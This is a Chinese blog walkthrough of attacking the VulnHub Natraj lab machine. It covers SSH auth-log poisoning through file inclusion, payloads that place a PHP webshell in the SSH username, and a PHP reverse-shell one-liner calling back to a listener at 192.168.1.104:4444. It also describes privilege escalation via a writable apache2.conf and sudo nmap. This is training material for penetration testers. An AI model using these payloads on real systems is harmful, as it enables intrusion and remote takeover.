【打靶练习】vulnhub: Natraj

已于 2024-03-19 11:25:36 修改
阅读量240 收藏
点赞数
分类专栏: OSCP打靶练习 文章标签: android
于 2023-07-23 21:03:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35208730/article/details/131878652
版权

照例进行端口扫描,服务扫描

在这里插入图片描述
22和80就不用专门进行服务识别了

发现80端口,尝试访问,并进行目录扫描

在这里插入图片描述
貌似就是一个静态页面,先不管,扫目录
在这里插入图片描述

发现console目录下有file.php,访问后返回页面为空,猜测缺少传参
在这里插入图片描述

参数爆破

一般这里的参数名都是file,但是跑一下字典
在这里插入图片描述
在这里插入图片描述

这里发现两个用户natraj和mahakal,记一下后面可能用到

另外文件读取应该有两种可能,一种是单纯的任意文件读取,另一种是文件包含。而文件读取很难获取shell,所以先尝试文件包含方向

文件包含利用

结合已有的信息,文件包含的利用,需要能够将恶意代码写到目标靶机。而现在能控制的只有22端口的ssh登录日志和web的访问日志。都尝试访问读取一下

/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd/access.log
/var/log/auth.log

只有ssh登录日志可以访问到
在这里插入图片描述

尝试ssh登录日志注入

经过多次尝试,得到以下可以成功注入的payload,主要是要转义$符号。bypass绕过的思路还是要提升。。

ssh "<?php @eval(\$_GET['cmd']);?>"@172.16.33.18
ssh "<?php system(\$_GET['cmd']);?>"@172.16.33.18,感觉这个比较稳定,推荐用system函数

在这里插入图片描述
这边线上的靶场,容易出问题,最好用自己单独使用的靶场,注入失败了可以直接还原快照
以下基于自己搭建的靶场操作
在这里插入图片描述
命令执行成功

反弹shell

php -r '$sock=fsockopen("192.168.1.104",4444);exec("/bin/bash <&3 >&3 2>&3");'

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
获取的shell还不完整,利用bash命令再反弹一次
在这里插入图片描述

同时利用python3升级一下完整shell,方便后续操作
在这里插入图片描述

提权

查看系统版本,发现是Ubuntu18.04,通过CVE-2021-3493基本可以通杀,但这个靶机的初衷应该不是通过这种方式提权
在这里插入图片描述

查看当前系统进程信息

ps -ef

在这里插入图片描述

find / -type f -writable 2>/dev/null | grep -v proc

在这里插入图片描述
查找可写文件,发现apache2.conf可写,可以更改apache启动用户,然后反弹回其他用户的shell(apache无法使用root用户启动)

更改apache2.conf文件,一共两个用户natraj和mahakal,natraj尝试了没有提权成功
在这里插入图片描述
手动重启虚拟机,然后同样利用日志注入和文件包含漏洞触发反弹shell
在这里插入图片描述

尝试mahakal
在这里插入图片描述
查找suid可执行文件,查看可以sudo执行的命令
在这里插入图片描述
发现nmap命令可以sudo执行,可以利用nmap进行提权
在这里插入图片描述
提权成功

分等级考试的佛
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OSCP-1-3-natraj(本地文件包含、日志中毒、apache2配置漏洞、nmap提权)
墨痕诉清风的博客
06-30 205
像往常一样,我们将使用“Netdiscover”工具识别主机的 IP。所以,让我们首先用 nmap 列出所有 TCP 端口。我们从访问web服务(80端口)开始,在那里我们找到了几张关于Natraj的图片和信息,我们将查看源代码和robots.txt,似乎没有什么有用的。(或至少,目前)。因此,让我们继续进行。在 Dirb 及其默认字典的帮助下,我们找到了一个名为“”的目录。我们进入并列出一个名为“”的文件:如果我们执行它,我们会看到它什么也不做。我们可能需要添加其他内容。
vulnhub靶机测试-HA: Joker
桜的博客
05-07 789
靶机导入虚拟机设置为NAT 首先找到靶机ip Ok,找到靶机ip 盲猜下端口8080: 抓包看看,base64。 进行爆破 登录进来是这样的 用刚才的密码登录不了,看下源码 是joomla的 百度了一下默认的后台: Joomla默认密码进入后台: 在模板的 index.php中写入shell <?php function which($pr) { $pat...
Natraj靶场渗透测试
qq_41567985的博客
11-13 149
Natraj靶场渗透测试主要通过文件包含,本地包含ssh登录日志,因为登录日志会记录错误的登录用户名,所以导致了一句话木马的写入。使用蚁剑进入tmp目录,使用wget命令下载mshell.elf文件,并赋予执行权限,执行mshell.elf文件。用户名test被记录进入了该文件,那么我们可以猜测-把用户名写成一句话木马,应该也能被写入。查看日志/vat/log/auth.log 发现记录了ssh登录历史。# 目标机器到tmp目录下下载(有下载权限)使用curl查看该日志文件可以发现。
VulnHub靶场之HA: NARAK
A_dmin的博客
10-01 1665
VulnHub靶场之HA: NARAK 一开始扫描存活主机ip: 执行命令:nmap -sV -p 1-65535 192.168.198.148 先查看80端口,是一个网页: 目录扫描: 发现存在一个401的登陆页面,利用cewl生成字典: 利用hydra对其进行爆破,hydra -L woldlist.txt -P woldlist.txt 192.168.198.148 http-get /webdav 得到账号密码yamdoot:Swarg: 成功进入: 后面没有思路了,,,emmmm
vulnhub HA: Natraj
箭雨镜屋
06-30 1250
渗透思路:nmap扫描----dirb扫描网站目录----ffuf爆破url参数----利用auth.log和LFI获得反弹shell----修改/etc/apache2/apache2.conf获得mahakal的shell----sudo nmap提权
PG::Ha-natraj
aya3t的博客
11-25 620
PROVING GROUNDS::Ha-natraj
vulnhub----natraj靶机
woshicainiao666的博客
04-04 664
nmap提权
vulhub-HA:Natraj
2201_75378806的博客
05-14 276
因为这是 auth.log 并且访问机器的唯一方法是通过 ssh。3.在kali上创建一个php的reverseshell并将其上传到目标。检查了是否可以访问任何日志文件(apache2、auth 等)。尝试了不同的 shell(nc、python2、python3)。Python3 是成功的。fuzz大法,看看有没有参数(可以用Bp)一开始是fuzz文件,后来直接fuzz参数。2.使用wget将文件上传到目标机器并复制该文件以替换apache2的实际配置文件。尝试访问这些用户的 ssh 密钥,没成功。
kali渗透综合靶机(十一)--BSides-Vancouver靶机
W小哥
03-29 619
一、靶机下载 下载链接:https://pan.baidu.com/s/1s2ajnWHNVS_NZfnAjGpEvw 二、BSides-Vancouver靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.5 靶机IP:192.168.212.7...
拉吉拉曼
02-16
你好呀 :waving_hand: ,我是Natraj 我在Power Platform中工作 我原籍印度,但目前居住在澳大利亚墨尔本 :kangaroo: 。 我是典型印度人的刻板印象-我学习了非CS工程学,但是我目前在技术行业工作。 我最初是一名...
兰德-2020年米果生命小组调查COVID-19的影响(英文)-2020.5-4页精品报告2020.pdf
04-24
在标题和描述中,我们注意到这份报告是由 RAND Corporation 的 Katherine Grace Carman 和 Shanthi Natraj 负责的,其主题是关于 COVID-19 对社会的前所未有的影响。报告通过 RAND American Life Panel (ALP) 进行了...
[第五空间 2021]EasyCleanup
liaochonxiang的博客
08-18 258
注意的是,如果我们只上传一个文件,这里也是不会遗留下Session文件的,所以表单里必须有两个以上的文件上传。【文件包含&条件竞争】利用session.upload_progress文件包含进行RCE。
dynamic-datasource-spring-boot-starter多数据源配置
wyazyf
08-22 92
这种多数据源的配置方式可以不用区分包和扫描路径。放在同一路径下即可。默认在主数据库中加载。调用其他数据源的时候,只需要在mapper.java文件上配置@DS(“mainData”)即可。
MySQL数据库——表的CURD(Delete)
m0_63596031的博客
08-19 222
truncate [table] table_name 注意:这个操作慎用 1.只能对整表操作,不能像DELETE一样针对部分数据操作; 2.实际上MySQL不对数据操作,所以比DELETE更快,但是TRUNCATE在删除数据的时候,并不经过真正的事务,所以无法回滚 3.会重置AUTO_INCREMENT项
Android笔试面试题AI答之Kotlin补充考点
学无止境,止于至善
08-22 416
博客中虽然包含了大量关于Kotlin的面试题,但并未涵盖Kotlin所有可能的面试考点。这些考点可能不会在每一次面试中都出现,但它们对于深入理解Kotlin语言和其在不同场景下的应用非常重要。
高校迎新系统app/基于android的高校迎新系统的设计与实现
m0_73706453的博客
08-18 847
在我们这当代,一个网络技飞速发展的信息化时代,对我们刚毕业的大新生都会面临界了一个机遇和新的挑战,我们在学校不仅学习各种文化知识,还能发挥我们的专业知识,我在想对于刚被录取的大一新生,他们怀着梦想来到大学,以前都是父母的陪同下,尤其是现在新冠还是存在,怎么样才能帮助他们呢。让我想起了一个结合我的认知,开发一套高校迎新系统app,即可以实现自身毕业烦恼,又可以为新生完成一个简单的高校迎新系统app。本文首先介绍了高校迎新系统app的主要模块:新生信息、新生报到、宿舍信息、新生费用、新生交流等。
Android笔试面试题AI答之Kotlin(17)
学无止境,止于至善
08-21 544
在Kotlin中,你可以使用关键字来定义一个伴侣对象。这个对象将自动实现该类的伴生接口(如果Kotlin编译器生成的话),这使得你可以通过类名直接访问伴侣对象中的属性和方法。counter++@JvmStatic // 用于Java互操作// 使用伴侣对象println(MyClass.getCounter()) // 输出 1虽然高阶函数和Lambda表达式本身并不直接提供性能优化的手段,但它们通过改善代码结构、提高代码的可重用性和可读性,以及促进函数式编程风格,间接地促进了性能优化。
Chromium编译指南2024 - Android篇:安装其他构建依赖项(七)
守城小轩的技术窝棚
08-19 849
通过以上步骤,您已经成功安装了编译 Chromium for Android 所需的所有构建依赖项,并确保开发环境准备就绪。这为接下来的编译工作打下了坚实的基础。确保所有依赖项和工具都已正确安装和配置,这对于顺利编译 Chromium 至关重要。在下一篇文章《Chromium编译指南2024 - Android篇:开始编译(八)》中,我们将详细介绍如何实际开始编译 Chromium for Android,包括具体的编译命令和常见问题的处理方法。敬请期待。
Android调整进程的oom_adj
最新发布
zoujin6649的博客
08-22 289
LinuxKernel中的OOM Killer,内核所管理的进程都有一个衡量其oom权重的值,存储在/proc/<PID>/oom_adj中。比如oom_score分数越低的进程,被杀死的概率越小,或者说被杀死的时间越晚。对于某些非常重要的应用程序,我们不希望它们被系统杀死,一个最简单的方法就是在它的AndroidManifest.xml文件中给“application”标签添加“android:persistent=true”属性。Android系统也为此开发了一个专门的驱动,名为。
hyperf 协程上下文
xxpxxpoo8的专栏
08-20 386
由于同一个进程内协程间是内存共享的,但协程的执行/切换是非顺序的,也就意味着我们很难掌控当前的协程是哪一个(事实上可以,但通常没人这么干),所以我们需要在发生协程切换时能够同时切换对应的上下文。以hyperf 2.2版本为例。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值